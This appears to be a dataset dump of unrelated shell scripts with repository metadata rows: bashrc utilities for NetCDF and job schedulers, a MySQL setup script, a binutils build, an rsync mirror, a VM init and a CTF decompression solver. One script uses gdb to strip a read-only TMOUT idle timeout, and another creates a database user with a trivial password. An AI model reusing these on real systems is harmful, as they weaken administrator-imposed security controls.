# bind 'set page-completions off' # no more --more-- pager when list too big
# bind 'set completion-query-items 0' # never ask for user confirmation if there's too much stuff
# bind 'set mark-symlinked-directories on' # add trailing slash to directory symlink
# bind '"\C-i": menu-complete' # this will not pollute scroll history; better
# bind '"\e-1\C-i": menu-complete-backward' # this will not pollute scroll history; better
# bind '"\e[Z": "\e-1\C-i"' # shift tab to go backwards
# bind '"\C-l": forward-char'
# bind '"\C-s": beginning-of-line' # match vim motions
# bind '"\C-e": end-of-line' # match vim motions
# bind '"\C-h": backward-char' # match vim motions
# bind '"\C-w": forward-word' # requires
# bind '"\C-b": backward-word' # by default c-b moves back one word, and deletes it
# bind '"\eOP": menu-complete' # history
# bind '"\eOQ": menu-complete-backward' # history
# bind '"\C-j": next-history'
# bind '"\C-k": previous-history' # history
# bind '"\C-j": next-history'
# bind '"\C-p": previous-history' # history
# bind '"\C-n": next-history'
# stty werase undef # no more ctrl-w word delete function; allows c-w re-binding to work
# stty stop undef # no more ctrl-s
# stty eof undef # no more ctrl-d
# }
# _setup_bindings 2>/dev/null # ignore any errors
# # Shell Options
# # Check out 'shopt -p' to see possibly interesting shell options
# # Note diff between .inputrc and .bashrc settings: https://unix.stackexchange.com/a/420362/112647
# _setup_opts() {
# # Turn off history expansion, so can use '!' in strings; see: https://unix.stackexchange.com/a/33341/112647
# set +H
# # No more control-d closing terminal
# set -o ignoreeof
# # Disable start/stop output control
# stty -ixon # note for putty, have to edit STTY value and set ixon to zero in term options
# # Exit this script when encounter error, and print each command; useful for debugging
# # set -ex
# # Various shell options
# shopt -s cmdhist # save multi-line commands as one command in shell history
# shopt -s checkwinsize # allow window resizing
# shopt -u nullglob # turn off nullglob; so e.g. no null-expansion of string with ?, * if no matches
# shopt -u extglob # extended globbing; allows use of ?(), *(), +(), +(), @(), and !() with separation "|" for OR options
# shopt -u dotglob # include dot patterns in glob matches
# shopt -s direxpand # expand dirs
# shopt -s dirspell # attempt spelling correction of dirname
# shopt -s cdspell # spelling errors during cd arguments
# shopt -s cdable_vars # cd into shell variable directories, no $ necessary
# shopt -s nocaseglob # case insensitive
# shopt -s autocd # typing naked directory name will cd into it
# shopt -s no_empty_cmd_completion # no more completion in empty terminal!
# shopt -s histappend # append to the history file, don't overwrite it
# shopt -s cmdhist # save multi-line commands as one command
# shopt -s globstar # **/ matches all subdirectories, searches recursively
# shopt -u failglob # turn off failglob; so no error message if expansion is empty
# # shopt -s nocasematch # don't want this; affects global behavior of case/esac, and [[ =~ ]] commands
# # Related environment variables
# export HISTIGNORE="&:[ ]*:return *:exit *:cd *:source *:. *:bg *:fg *:history *:clear *" # don't record some commands
# export PROMPT_DIRTRIM=2 # trim long paths in prompt
# export HISTSIZE=50000
# export HISTFILESIZE=10000 # huge history -- doesn't appear to slow things down, so why not?
# export HISTCONTROL="erasedups:ignoreboth" # avoid duplicate entries
# }
# _setup_opts 2>/dev/null # ignore if option unavailable
#-----------------------------------------------------------------------------#
# General utilties
#-----------------------------------------------------------------------------#
# Configure ls behavior, define colorization using dircolors
if [ -r "$HOME/.dircolors.ansi" ]; then
$_macos && _dc_command=gdircolors || _dc_command=dircolors
eval "$($_dc_command $HOME/.dircolors.ansi)"
fi
$_macos && _ls_command=gls || _ls_command=ls
alias ls="$_ls_command --color=always -AF" # ls useful (F differentiates directories from files)
alias ll="$_ls_command --color=always -AFhl" # ls "list", just include details and file sizes
alias la="$_ls_command --color=always -AFla"
alias lh="$_ls_command --color=always -AFlhtr"
alias cd="cd -P" # don't want this on my mac temporarily
alias ctags="ctags --langmap=vim:+.vimrc,sh:+.bashrc" # permanent lang maps
# Follow a log file with tail -f, first waiting (polling every 2s) for the
# file to exist and become readable.
log() {
  local target=$1
  until [ -r "$target" ]; do
    echo "Waiting..."
    sleep 2
  done
  tail -f "$target"
}
# Standardize less/man/etc. colors
# Used this: https://unix.stackexchange.com/a/329092/112647
export LESS="--RAW-CONTROL-CHARS"
[ -f ~/.LESS_TERMCAP ] && . ~/.LESS_TERMCAP
if hash tput 2>/dev/null; then
export LESS_TERMCAP_md=$'\e[1;33m' # begin blink
export LESS_TERMCAP_so=$'\e[01;44;37m' # begin reverse video
export LESS_TERMCAP_us=$'\e[01;37m' # begin underline
export LESS_TERMCAP_me=$'\e[0m' # reset bold/blink
export LESS_TERMCAP_se=$'\e[0m' # reset reverse video
export LESS_TERMCAP_ue=$'\e[0m' # reset underline
export GROFF_NO_SGR=1 # for konsole and gnome-terminal
fi
# Information on directories
$_macos || alias hardware="cat /etc/*-release" # print out Debian, etc. release info
$_macos || alias cores="cat /proc/cpuinfo | awk '/^processor/{print \$3}' | wc -l"
# Directory sizes, normal and detailed, analagous to ls/ll
alias df="df -h" # disk useage
alias du='du -h -d 1' # also a better default du
ds() {
  # List the immediate subdirectories of $1 (default: current dir) in
  # columns, with any leading "./" stripped and spaces escaped.
  # Fix: the original tested `[ -z $1 ]` unquoted, which errored out
  # whenever the argument contained whitespace.
  local dir=${1:-.}
  find "$dir" -maxdepth 1 -mindepth 1 -type d -print \
    | sed 's|^\./||' | sed 's| |\\ |g' | _columnize
}
dl() {
  # Like ds, but print each subdirectory with its du -hs size, sorted by
  # human-readable size (GNU sort is `gsort` on macOS).
  # Fix: quote-safe default for $1 -- the old `[ -z $1 ]` broke on
  # arguments containing whitespace.
  local cmd dir=${1:-.}
  ! $_macos && cmd=sort || cmd=gsort
  find "$dir" -maxdepth 1 -mindepth 1 -type d -exec du -hs {} \; \
    | sed $'s|\t\./|\t|' | sed 's|^\./||' | $cmd -sh
}
# Grepping and diffing; enable colors
alias grep="grep --exclude-dir=_site --exclude-dir=plugged --exclude-dir=.git --exclude-dir=.svn --color=auto"
alias egrep="egrep --exclude-dir=_site --exclude-dir=plugged --exclude-dir=.git --exclude-dir=.svn --color=auto"
# git-completion
if [ -f ~/dotfiles/.git-completion.bash ]; then
. ~/dotfiles/.git-completion.bash
fi
#-----------------------------------------------------------------------------#
# Aliases/functions for printing out information
#-----------------------------------------------------------------------------#
# The -X show bindings bound to shell commands (i.e. not builtin readline functions, but strings specifying our own)
# The -s show bindings 'bound to macros' (can be combination of key-presses and shell commands)
# NOTE: Example for finding variables:
# for var in $(variables | grep -i netcdf); do echo ${var}: ${!var}; done
# NOTE: See: https://stackoverflow.com/a/949006/4970632
alias aliases="compgen -a"
alias variables="compgen -v"
alias functions="compgen -A function" # show current shell functions
alias builtins="compgen -b" # bash builtins
alias commands="compgen -c"
alias keywords="compgen -k"
alias modules="module avail 2>&1 | cat "
if $_macos; then
alias bindings="bind -Xps | egrep '\\\\C|\\\\e' | grep -v 'do-lowercase-version' | sort" # print keybindings
alias bindings_stty="stty -e" # bindings
else
alias bindings="bind -ps | egrep '\\\\C|\\\\e' | grep -v 'do-lowercase-version' | sort" # print keybindings
alias bindings_stty="stty -a" # bindings
fi
alias inputrc_ops="bind -v" # the 'set' options, and their values
alias inputrc_funcs="bind -l" # the functions, for example 'forward-char'
env() { set; } # just prints all shell variables
#-----------------------------------------------------------------------------#
# Supercomputer tools
#-----------------------------------------------------------------------------#
alias suser="squeue -u $USER"
alias sjobs="squeue -u $USER | tail -1 | tr -s ' ' | cut -s -d' ' -f2 | tr -d '[:alpha:]'"
# Kill PBS processes all at once; useful when debugging stuff, submitting teeny
# jobs. The tail command skips first (n-1) lines.
qkill() {
  # Delete every one of the user's PBS jobs.  qstat's first two lines
  # are headers; the job id is the first dot-separated token of field 1.
  local job
  for job in $(qstat | tail -n +3 | cut -d' ' -f1 | cut -d. -f1); do
    qdel "$job"
    echo "Deleted job $job"
  done
}
#-----------------------------------------------------------------------------#
# Dataset utilities
#-----------------------------------------------------------------------------#
# NetCDF tools (should just remember these)
# NCKS behavior very different between versions, so use ncdump instead
# * Note if HDF4 is installed in your anaconda distro, ncdump will point to *that location* before
# the homebrew install location 'brew tap homebrew/science, brew install cdo'
# * This is bad, because the current version can't read netcdf4 files; you really don't need HDF4,
# so just don't install it
# Summaries first
nchelp() {
  # Summarize the available nc* helper functions as an aligned table.
  local table
  table="ncinfo ncglobal ncvars ncdims
ncin nclist ncvarlist ncdimlist
ncvarinfo ncvardump ncvartable ncvartable2"
  echo "Available commands:"
  echo "$table" | column -t
}
ncglobal() { # show just the global attributes
  # Page everything from ncdump's "//" comment lines onward (where the
  # global attributes are listed) through less.
  [ $# -ne 1 ] && echo "Usage: ncglobal FILE" && return 1
  command ncdump -h "$@" | grep -A100 ^// | less
}
ncinfo() { # only get text between variables: and linebreak before global attributes
  # Page the full ncdump header minus its first and last line.
  # command ncdump -h "$1" | sed '/^$/q' | sed '1,1d;$d' | less # trims first and last lines; do not need these
  [ $# -ne 1 ] && echo "Usage: ncinfo FILE" && return 1
  ! [ -r "$1" ] && { echo "File \"$1\" not found."; return 1; }
  command ncdump -h "$1" | sed '1,1d;$d' | less # trims first and last lines; do not need these
}
ncvars() { # the space makes sure it isn't another variable that has trailing-substring
  # identical to this variable, -A prints TRAILING lines starting from FIRST match,
  # -B means prinx x PRECEDING lines starting from LAST match
  # Show only the "variables:" section of the header, de-indented.
  [ $# -ne 1 ] && echo "Usage: ncvars FILE" && return 1
  ! [ -r "$1" ] && echo "Error: File \"$1\" not found." && return 1
  command ncdump -h "$1" | grep -A100 "^variables:$" | sed '/^$/q' | \
    sed $'s/^\t//g' | grep -v "^$" | grep -v "^variables:$" | less
}
ncdims() {
  # Tabulate the "dimensions:" section as aligned "name = length" rows.
  [ $# -ne 1 ] && echo "Usage: ncdims FILE" && return 1
  ! [ -r "$1" ] && echo "Error: File \"$1\" not found." && return 1
  command ncdump -h "$1" | sed -n '/dimensions:/,$p' | sed '/variables:/q' | sed '1d;$d' \
    | tr -d ';' | tr -s ' ' | column -t
}
# Listing stuff
ncin() { # simply test membership; exit code zero means variable exists, exit code 1 means it doesn't
  # Usage: ncin NAME FILE -- succeeds iff NAME appears in the file's
  # dimensions section.
  # NOTE(review): the final `grep "$1"` is a substring match, so e.g.
  # `ncin lon` also succeeds for "longitude" -- confirm if exact
  # matching was intended.
  [ $# -ne 2 ] && echo "Usage: ncin VAR FILE" && return 1
  ! [ -r "$2" ] && echo "Error: File \"$2\" not found." && return 1
  command ncdump -h "$2" | sed -n '/dimensions:/,$p' | sed '/variables:/q' \
    | cut -d'=' -f1 -s | xargs | tr ' ' '\n' | grep -v '[{}]' | grep "$1" &>/dev/null
}
nclist() { # only get text between variables: and linebreak before global attributes
  # note variables don't always have dimensions! (i.e. constants)
  # in this case looks like " double var ;" instead of " double var(x,y) ;"
  # Emit a sorted list of all declared variable names, one per line.
  [ $# -ne 1 ] && echo "Usage: nclist FILE" && return 1
  ! [ -r "$1" ] && echo "Error: File \"$1\" not found." && return 1
  command ncdump -h "$1" | sed -n '/variables:/,$p' | sed '/^$/q' | grep -v '[:=]' \
    | cut -d';' -f1 | cut -d'(' -f1 | sed 's/ *$//g;s/.* //g' | xargs | tr ' ' '\n' | grep -v '[{}]' | sort
}
ncdimlist() { # get list of dimensions
  # Emit a sorted list of dimension names: the left-hand sides of the
  # "name = length ;" entries in the dimensions section.
  [ $# -ne 1 ] && echo "Usage: ncdimlist FILE" && return 1
  ! [ -r "$1" ] && echo "Error: File \"$1\" not found." && return 1
  command ncdump -h "$1" | sed -n '/dimensions:/,$p' | sed '/variables:/q' \
    | cut -d'=' -f1 -s | xargs | tr ' ' '\n' | grep -v '[{}]' | sort
}
ncvarlist() { # only get text between variables: and linebreak before global attributes
  # Variables are every name nclist reports minus the dimension names.
  # Fix: `item` is now declared local -- previously the loop variable
  # leaked into the interactive shell (this file is sourced).
  local list dmnlist varlist item
  [ $# -ne 1 ] && echo "Usage: ncvarlist FILE" && return 1
  ! [ -r "$1" ] && echo "Error: File \"$1\" not found." && return 1
  list=($(nclist "$1"))
  dmnlist=($(ncdimlist "$1"))
  for item in "${list[@]}"; do
    # padded-substring membership test against the dimension list
    if [[ ! " ${dmnlist[@]} " =~ " $item " ]]; then
      varlist+=("$item")
    fi
  done
  echo "${varlist[@]}" | tr -s ' ' '\n' | grep -v '[{}]' | sort # print results
}
# Inquiries about specific variables
ncvarinfo() { # as above but just for one variable
  # Print the declaration and attributes of variable $1 in file $2, with
  # the "var:" prefixes and leading tabs stripped.
  [ $# -ne 2 ] && echo "Usage: ncvarinfo VAR FILE" && return 1
  ! [ -r "$2" ] && echo "Error: File \"$2\" not found." && return 1
  command ncdump -h "$2" | grep -A100 "[[:space:]]$1(" | grep -B100 "[[:space:]]$1:" | sed "s/$1://g" | sed $'s/^\t//g'
  # the space makes sure it isn't another variable that has trailing-substring
  # identical to this variable; and the $'' is how to insert literal tab
}
ncvardump() { # dump variable contents (first argument) from file (second argument)
  [ $# -ne 2 ] && echo "Usage: ncvardump VAR FILE" && return 1
  ! [ -r "$2" ] && echo "Error: File \"$2\" not found." && return 1
  # NOTE(review): _reverse is assigned without `local`, so it leaks into
  # the calling shell -- harmless here but worth confirming.
  $_macos && _reverse="gtac" || _reverse="tac"
  # command ncdump -v "$1" "$2" | grep -A100 "^data:" | tail -n +3 | $_reverse | tail -n +2 | $_reverse
  command ncdump -v "$1" "$2" | $_reverse | egrep -m 1 -B100 "[[:space:]]$1[[:space:]]" | sed '1,1d' | $_reverse
  # tail -r reverses stuff, then can grep to get the 1st match and use the before flag to print stuff
  # before (need extended grep to get the coordinate name), then trim the first line (curly brace) and reverse
}
ncvartable() { # parses the CDO parameter table; ncvarinfo replaces this
  # Below procedure is ideal for "sanity checks" of data; just test one
  # timestep slice at every level; the tr -s ' ' trims multiple whitespace
  # to single and the column command re-aligns columns
  [ $# -ne 2 ] && echo "Usage: ncvartable VAR FILE" && return 1
  ! [ -r "$2" ] && echo "Error: File \"$2\" not found." && return 1
  # NOTE(review): `local args` is declared twice on purpose? The second
  # declaration keeps only the arguments after VAR FILE.
  local args=("$@")
  local args=(${args[@]:2}) # extra arguments
  cdo -s infon ${args[@]} -seltimestep,1 -selname,"$1" "$2" | tr -s ' ' | cut -d ' ' -f 6,8,10-12 | column -t 2>&1 | less
}
ncvartable2() { # as above but show everything
  # Same as ncvartable, but without the column filtering.
  [ $# -ne 2 ] && echo "Usage: ncvartable2 VAR FILE" && return 1
  ! [ -r "$2" ] && echo "Error: File \"$2\" not found." && return 1
  local args=("$@")
  local args=(${args[@]:2}) # extra arguments
  cdo -s infon ${args[@]} -seltimestep,1 -selname,"$1" "$2" 2>&1 | less
}
#-----------------------------------------------------------------------------#
# Aliases
#-----------------------------------------------------------------------------#
# CU Boulder Web
alias storm='ssh ribr5703@storm.colorado.edu'
# CU Boulder Summmit
alias summit='ssh ribr5703@login.rc.colorado.edu'
# NCAR Cheyenne
alias cheyenne='ssh -X -t rbrady@cheyenne.ucar.edu'
# LANL Institutional Computing
alias lanl='ssh -X -t rileybrady@wtrw.lanl.gov'
alias grizzly='ssh -X -t rileybrady@wtrw.lanl.gov ssh gr-fe'
alias wolf='ssh -X -t rileybrady@wtrw.lanl.gov ssh wf-fe'
alias jupyter-grizzly='ssh -X -t -L 8888:localhost:2452 rileybrady@wtrw.lanl.gov ssh -L 2452:localhost:8888 gr-fe1'
# NERSC/CORI
alias cori='ssh -X -t bradyrx@cori.nersc.gov'
# Cellar
alias cellar='ssh ribr5703@cellar.int.colorado.edu'
# # Software
alias matlab='MATLAB -nodesktop -nosplash'
# # Assorted commands
alias filecount='ls | wc -l'
# PBS Job Scheduler (e.g. Cheyenne)
# interactive job
alias qi='qsub -I -l select=1:ncpus=1 -l walltime=10800 -A P93300670 -q share'
# see your jobs
alias qq='qstat -u ${USER}'
# job history
alias qh='qhist -u ${USER}'
# Slurm Job Scheduler (e.g. LANL IC)
# interactive job
alias sinteractive='salloc --time=04:00:00 --qos=interactive'
# see your jobs
alias sq='squeue -u ${USER}'
# check what jobs are running on system
alias srunning='squeue -l | grep " RUNNING" | more'
# check what jobs are idle on system
alias sidle='squeue -l | grep -v " RUNNING" | more'
# check approximate start time for your jobs
alias sstart='squeue --start -u ${USER}'
# Get full name of jobs that are running
alias sname='sacct --format="JobID,JobName%60"'
# Weather!
alias weather='curl wttr.in'
# Other
alias cl='clear'
| true |
cc3e3d6701a55d1aca0260669466f1e94ef3a784 | Shell | umd-lib/aspace-vagrant | /scripts/database.sh | UTF-8 | 595 | 2.8125 | 3 | [
"Apache-2.0"
] | permissive | #/bin/bash
# MySQL JDBC driver version fetched for ArchivesSpace.
MYSQL_JDBC_VERSION=5.1.38
# install JDBC driver
cd /apps/aspace/archivesspace
curl -Lso lib/mysql-connector-java-${MYSQL_JDBC_VERSION}.jar \
  https://maven.lib.umd.edu/nexus/repository/central/mysql/mysql-connector-java/${MYSQL_JDBC_VERSION}/mysql-connector-java-${MYSQL_JDBC_VERSION}.jar
# set up MySQL database (assumes passwordless local root access)
mysql -u root <<END
CREATE DATABASE archivesspace default character set utf8;
CREATE USER 'as'@'localhost' IDENTIFIED BY 'as';
GRANT ALL PRIVILEGES ON archivesspace.* TO 'as'@'localhost';
END
# create tables
source /apps/aspace/config/env
scripts/setup-database.sh
| true |
56d4379b51dad97f2d977ead5e4c665097f7655c | Shell | gstadhiyal/shell_scripting | /num_patrn1.sh | UTF-8 | 170 | 2.953125 | 3 | [] | no_license | #!/bin/sh
# Print a number triangle: row i contains "1 2 ... i" for i = 1..N,
# where N is read from stdin.
# Fixes: the original used bash-only `for (( ))` loops and the
# non-portable `echo -n` under a #!/bin/sh shebang, which breaks where
# /bin/sh is dash.  Rewritten with POSIX while loops and printf; the
# output (including the original prompt text) is unchanged.
printf '%s' "How many time your want to print start: "
read b
i=1
while [ "$i" -le "$b" ]; do
    j=1
    while [ "$j" -le "$i" ]; do
        printf '%s ' "$j"
        j=$((j + 1))
    done
    echo
    i=$((i + 1))
done
| true |
04b98bbac8cc37b859f0e415fddeb8cb17c83881 | Shell | adamjedrzejewski/ToddLinux | /host/setup/packages/binutils.sh | UTF-8 | 490 | 2.921875 | 3 | [
"MIT"
] | permissive | # See LICENSE for license details.
#!/bin/bash
set -euo pipefail
# Wipe any stale source tree, unpack a fresh one, and move into an
# out-of-tree build directory.
unpack_src() {
  rm -r binutils-2.36.1 2>/dev/null
  tar xf binutils-2.36.1.tar.xz && cd binutils-2.36.1 && mkdir build && cd build
  return
}

# Configure cross-binutils for target $LFS_TGT, installing under
# $LFS/tools.
configure() {
  ../configure \
    --prefix=$LFS/tools \
    --with-sysroot=$LFS \
    --target=$LFS_TGT \
    --disable-nls \
    --disable-werror
  return
}

# Compile, then install with a single job.
make_install() {
  make && make -j1 install
  return
}

unpack_src && configure && make_install
| true |
461afc3f2ab95b9ba7369c645de988c9bec35184 | Shell | pedroromn/shwork | /and_comparision_string.sh | UTF-8 | 259 | 3.65625 | 4 | [] | no_license | #! /bin/bash
# Report whether CAPITAL ($2) is the capital of STATE ($1); only the
# CA/sacramento pair is known.
# Fix: use [[ ]] with quoted expansions and && -- the original unquoted
# `[ $state == ... -a ... ]` crashed when run with no arguments, and
# the `-a` conjunction inside [ ] is obsolescent/ambiguous.
state=${1}
capital=${2}
if [[ "$state" == "CA" && "$capital" == "sacramento" ]]
then
   echo "Yes. California capital is sacramento"
fi
if [[ "$state" == "CA" && "$capital" != "sacramento" ]]
then
   echo "No. California capital is not $capital"
fi
| true |
5c339b4ed4a14158ac020b57ef1b66f9f4e6e3ee | Shell | tenlastic/open-platform | /scripts/continuous-integration-angular.sh | UTF-8 | 328 | 2.703125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Abort on the first failing command.
set -e
# Most recent angular release tag and the commit it points at; lerna's
# --since flag then limits work to packages changed after that commit.
TAG=$(git describe --match "angular-v*" --abbrev=0 HEAD)
REVISION=$(git log -1 --format=format:"%H" $TAG)
# Lint, test, and build Angular applications.
lerna run lint --since $REVISION
lerna run build --concurrency 1 --include-dependencies --since $REVISION
lerna run test --concurrency 1 --since $REVISION
| true |
74c7ff6aa05314264f698d2d052c58fc61ff4285 | Shell | DeSerg/dotfiles | /.unset_tmout | UTF-8 | 195 | 3.140625 | 3 | [] | no_license | #!/bin/bash
# True iff the named shell variable is currently set (declare -p works
# even for read-only variables such as TMOUT).
variable-is-set() {
    declare -p "$1" > /dev/null 2>&1
}

# TMOUT may be exported read-only by a system profile, in which case a
# plain `unset TMOUT` fails; attach gdb to this very shell and call
# bash's internal unbind_variable() to remove it anyway.
if variable-is-set TMOUT; then
    echo "TMOUT set, unsetting"
    gdb -ex 'call unbind_variable("TMOUT")' --pid=$$ --batch
fi
| true |
5ac61700bb82dd0673b606e98f7a99a8b55a1799 | Shell | ngroberio/ocpAdvDepl | /config/bin/podLivenessCheck.sh | UTF-8 | 325 | 3.171875 | 3 | [] | no_license | #!/bin/bash
# Poll until pod $1 in project $2 reports "1/1 Running", rechecking
# every $3 seconds; the initial sleep gives the pod time to start.
echo ">> Liveness Check for Pod ${1} from Project ${2}"
sleep $3
while : ; do
  echo ">>>>> CHECK IF POD ${1} IS READY..."
  # Ignore build/deploy helper pods; a match means the pod is ready.
  oc get pod -n $2 | grep $1 | grep -v build | grep -v deploy |grep "1/1.*Running"
  # grep status 1 = no match yet; anything else (0 = found) breaks out.
  [[ "$?" == "1" ]] || break
  echo "NOT YET :( - WAITING FOR MORE ${3} SECONDS TO RETRY."
  sleep $3
done
| true |
3c95a90756baec8af9c4a295a47cc3e8f796c693 | Shell | ssabetan/minimega | /misc/vmbetter_configs/protonuke_overlay/init | UTF-8 | 451 | 2.578125 | 3 | [] | no_license | #!/bin/sh
# Minimal init for the protonuke VM image: mount pseudo filesystems,
# bring up devices and networking, start sshd and protonuke, then hand
# tty1 an interactive shell.
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs udev /dev
mkdir /dev/pts
mount -n -t devpts -o gid=5,mode=620 none /dev/pts
# device management
udevd --daemon
udevadm trigger
udevadm settle
chmod a+rx /
modprobe loop
# raise the open-file limit for the traffic generator
ulimit -n 999999
# protonuke's arguments come from the /protoargs helper binary
PROTONUKE=`/protoargs`
# networking: loopback plus DHCP on eth0
ifconfig lo up
dhclient -v eth0
mkdir /var/run/sshd
/usr/sbin/sshd
# start protonuke
/protonuke $PROTONUKE > /protonuke.log &
setsid sh -c 'exec sh </dev/tty1 >/dev/tty1 2>&1'
| true |
90cfa6b47280d49cfeb22e2fa9d2c22f54f3d9ff | Shell | fangfeixiang/fang | /inrsync.sh | UTF-8 | 372 | 3.109375 | 3 | [] | no_license | #!/bin/bash
#本脚本是用inotify和rsync配合实现两个文件/文件夹时时同步,可以pgrep -l inotify查看后台进程
#启动脚本时需要给定两具位置变量,分别代表原文件,目标文件
FROM_F=$1
DEST_F=$2
RSYNC_CMD="rsync -az --delete $FROM_F $DEST_F"
while inotifywait -rqq -e modify,delete,create,move,attrib $FROM_F
do
$RSYNC_CMD
done &
| true |
4d441d42273576a70799091da29516519dc9ada1 | Shell | hufflegamer123/GodModeButForLinux | /services.sh | UTF-8 | 2,052 | 3.640625 | 4 | [] | no_license | #!/bin/bash
# Interactive helper that disables systemd services not on a whitelist.
# Flow:
#   1. If the user answers "y" (they already edited badServices.txt),
#      disable everything listed there and exit.
#   2. Otherwise compute badServices.txt = running services minus
#      servicesWhitelist.txt, confirm, disable them, and finally offer
#      to re-enable everything again.
# Fixes vs. the original: $RESP and the service-name expansions are
# quoted, so an empty answer (plain Enter) no longer makes the
# `[ ... == 'y' ]` tests error out.
echo '!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!'
echo '              pay attention!!!'
echo '         Did you come back after'
echo '      editing the badServices file?'
echo '                  (y/n)'
echo '!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!'
read -p 'y/n: ' RESP
if [ "$RESP" == 'y' ]
then
    # One service name per line; -d '' slurps the whole file at once.
    IFS=$'\n' read -d '' -r -a badServices < badServices.txt
    for i in "${badServices[@]}"
    do
        systemctl disable "${i}"
        echo "Disabled ${i}"
        echo
    done
    exit 1
else
    echo "Okay"
fi
# Strip the status column and all blanks, then sort both lists so
# comm(1) can diff them; badServices.txt = running minus whitelist.
service --status-all > services.txt
servicesWhitelist=`awk -F] '{print $2}' servicesWhitelist.txt`
services=`awk -F] '{print $2}' services.txt`
echo "${servicesWhitelist//[[:blank:]]/}" > servicesWhitelist.txt
echo "${services//[[:blank:]]/}" > services.txt
sort services.txt > services2.txt
cat services2.txt > services.txt
sort servicesWhitelist.txt > servicesWhitelist2.txt
cat servicesWhitelist2.txt > servicesWhitelist.txt
comm -2 -3 services.txt servicesWhitelist.txt > badServices.txt
echo '!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!'
echo '              pay attention!!!'
cat badServices.txt
echo ' Do you want to delete these services?'
echo '                  (y/n)'
echo '!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!'
read -p 'y/n: ' RESP
if [ "$RESP" == 'y' ]
then
    echo
    echo "Then let's do this"
    echo
else
    echo
    echo "Then edit the badServices file."
    exit 1
fi
echo 'it worked'
IFS=$'\n' read -d '' -r -a badServices < badServices.txt
for i in "${badServices[@]}"
do
    systemctl disable "${i}"
    echo "Disabled ${i}"
done
echo '!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!'
echo '              pay attention!!!'
echo ' Do you want to reverse this action?'
echo '                  (y/n)'
echo '!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!'
read -p 'y/n: ' RESP
if [ "$RESP" == 'y' ]
then
    for i in "${badServices[@]}"
    do
        systemctl enable "${i}"
        echo "Reenabled ${i}"
        echo
    done
else
    echo "I'm glad to see at least someone is responsible..."
    echo
fi
| true |
c30ddecff57a093ae76eae0f76d3098e9cf49e21 | Shell | retronym/libscala | /bin/filter-git-repositories | UTF-8 | 327 | 3.9375 | 4 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | #!/bin/sh
# Filter the given repo directories: run <command> inside each and print
# only those that are git checkouts where the command succeeds.
# NOTE(review): the shebang is /bin/sh but `[[ ]]` is a bashism -- this
# only works where sh is bash; eval of an arbitrary command string is
# intentional here (the command comes from the invoking user).
[[ $# -gt 0 ]] || {
  echo "Usage: $(basename $0) <command> [repo repo....]"
  echo "  Runs command with cwd of each repo, echoing the name of the repo if it returns true."
  exit 0
}
command="$1"
shift
# The subshell keeps `cd` from leaking; non-git dirs and failing
# commands are silently skipped.
for repo in "$@"; do
  ( cd "$repo" 2>/dev/null && [[ -d .git ]] && eval "$command" >/dev/null && pwd )
done
| true |
e55b10304947bb01f674013a446853e0fa98c036 | Shell | Naincy224/naincyassignment | /practice problem day6/Day06Prob01/Day06Prob2.sh | UTF-8 | 174 | 2.859375 | 3 | [] | no_license | #!/bin/bash -x
# Read N from stdin and print the N-th harmonic number,
# H(N) = 1/1 + 1/2 + ... + 1/N, evaluated by bc with three decimal
# digits of precision (matching the original's scale=3).
read num
total=0
for ((term = 1; term <= num; term++)); do
    part=$(echo "scale=3;1/$term" | bc)
    total=$(echo "scale=3;$total+$part" | bc)
done
echo "$total"
| true |
48dd960a02c374359b885e41e9bcc863a4a40f36 | Shell | 5l1v3r1/Write-Ups-1 | /CTF/DownUnderCTF_2021/Misc/Rabbit/script.sh | UTF-8 | 696 | 3.375 | 3 | [] | no_license | #!/usr/bin/env bash
# CTF "Rabbit" solver: flag.txt is wrapped in many nested layers of
# compression/encoding.  Ask file(1) what it currently is and strip one
# layer per iteration until plain ASCII text remains.
FLAG=$(file flag.txt)
XZ='XZ'
EMPTY='empty'
BZIP2='bzip2'
GZIP='gzip'
ZIP='Zip'
TEXT='text'
while [[ $FLAG != "flag.txt: ASCII text" ]]; do
    FLAG=$(file flag.txt)
    case "$FLAG" in
        *"$XZ"*)
            mv flag.txt flag.txt.xz; xz -d flag.txt.xz ;;
        *"$EMPTY"*)
            unzip -o flag.txt ;;
        *"$BZIP2"*)
            mv flag.txt flag.txt.bz2; bzip2 -d flag.txt.bz2 ;;
        *"$GZIP"*)
            mv flag.txt flag.txt.gz; gzip -d flag.txt.gz ;;
        *"$ZIP"*)
            unzip -o flag.txt ;;
        *)
            # final layer; the probe is kept from the original, its
            # result is unused
            grep -q "$TEXT" <<< "$FLAG"
            cat flag.txt | base64 -d ;;
    esac
done
| true |
005aa9ef7963958175ed2c046836661a560de52c | Shell | sergi/dotfiles | /shell/bash_exports | UTF-8 | 1,864 | 2.78125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# bash_config
# Make vim the default editor
export EDITOR="vim"
# Ignore duplicate commands in the history
export HISTCONTROL=ignoredups
# Increase the maximum number of lines contained in the history file
# (default is 500)
export HISTFILESIZE=10000
# Increase the maximum number of commands to remember
# (default is 500)
export HISTSIZE=10000
# Make some commands not show up in history
# export HISTIGNORE="ls:ls *:cd:cd -:pwd;exit:date:* --help"
# Don't clear the screen after quitting a manual page
export MANPAGER="less -X"
# Export PhantomJS bin location (be explicit in case Homebrew is not installed
# in the default location)
export PHANTOMJS_BIN="$(brew --prefix)/bin/phantomjs"
# Make new shells get the history lines from all previous
# shells instead of the default "last window closed" history
export PROMPT_COMMAND="history -a; $PROMPT_COMMAND"
# This is necessary because Ruby is stupid
export LC_ALL=en_US.UTF-8
export LANG=en_US.UTF-8
export CLOJURESCRIPT_HOME=~/programming/clojurescript
export GOPATH=$HOME/go
export GECKO_PATH=~/programming/mozilla-central
export JAVA_HOME=$(/usr/libexec/java_home)
export PKG_CONFIG_PATH=/usr/local/lib/pkgconfig
export CHICKEN_BUILD=~/programming/chicken-4.9.0.1
export NVM_DIR=~/.nvm
export GAIADIR="~/programming/gaia"
export NIGHTLY="/Applications/FirefoxNightly.app/Contents/MacOS"
# Always enable colored `grep` output
